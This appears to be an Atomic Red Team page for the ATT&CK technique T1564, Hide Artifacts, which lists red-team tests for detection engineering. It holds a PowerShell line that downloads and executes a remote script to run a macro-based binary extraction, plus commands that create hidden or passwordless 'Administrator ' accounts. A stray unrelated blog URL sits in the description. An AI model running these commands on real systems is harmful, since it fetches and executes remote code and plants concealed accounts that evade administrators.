T1564
Hide Artifacts
Description from ATT&CK
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/
Atomic Tests
Atomic Test #1 - Extract binary files via VBA
This module extracts a binary (calc.exe) from inside of another binary.
In the wild maldoc authors will use this technique to hide binaries inside of files stored within the office document itself. An example of this technique can be seen in sample
f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2 is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system.
Supported Platforms: windows
auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
5
6
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
Cleanup Commands:
1
2
Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
Dependencies: Run with powershell!
Description: Microsoft Word must be installed
Check Prereq Commands:
1
2
3
4
5
6
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
Get Prereq Commands:
1
2
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
Atomic Test #2 - Create a Hidden User Called "$"
Creating a user with a username containing "$"
Supported Platforms: windows
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
net user $ ATOMIC123! /add /active:yes
Cleanup Commands:
1
net user $ /DELETE 2>&1
Atomic Test #3 - Create an "Administrator " user (with a space on the end)
Creating a user with a username containing with a space on the end
Supported Platforms: windows
auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
New-LocalUser -Name "Administrator " -NoPassword
Cleanup Commands:
1
Remove-LocalUser -Name "Administrator " 2>&1 | out-null